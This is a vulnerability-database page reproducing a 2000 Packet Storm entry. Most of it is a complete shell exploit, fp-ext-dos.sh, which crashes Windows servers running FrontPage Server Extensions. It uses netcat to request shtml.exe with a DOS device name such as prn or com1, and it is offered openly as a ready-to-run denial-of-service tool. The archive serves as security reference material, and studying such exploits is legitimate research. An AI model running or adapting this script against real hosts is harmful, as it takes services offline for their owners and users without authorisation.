Lucene search

K

fp-ext-dos.sh

🗓️ 13 Sep 2000 00:00:00Reported by Wouter ter MaatType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 21 Views

Script for Denial of Service attack targeting Frontpage Server Extension on outdated systems.

Show more

5 of 5AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`##############################################  
# Frontpage Server Extension shtml.exe DoS  
##############################################  
# advisory by : www.Xato.net  
# coded by : [email protected]  
##############################################  
# Devices who can cause a machine to crash are  
# com1, prn, aux   
#   
# http://grazer.gz.ee   
# looking for a team to join  
#  
# Vulnerable:  
# Microsoft Windows 98  
# Microsoft Windows 95  
# Microsoft Windows NT 4.0  
# Microsoft Windows NT 2000  
#  
#!/bin/sh  
  
port=80  
nc=/bin/nc  
  
function usage {  
clear  
echo Usage : sh $0 "<frontpage.victim> <device>"  
echo Example : sh $0 www.frontpage.com prn  
echo " by grazer "  
}  
  
if [ $2x = x ]; then  
usage  
exit 1  
fi  
if [ -s $nc ]; then  
clear  
echo Starting Denial of Service..  
echo "GET /_vti_bin/shtml.exe/$2.htm" |nc $1 $port  
echo Now check if the machine is down.  
else  
clear  
echo No NetCat found at $nc  
exit 1  
fi  
# www.hack.co.za [6 September 2000]#`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
13 Sep 2000 00:00Current
7.4High risk
Vulners AI Score7.4
21
.json
Report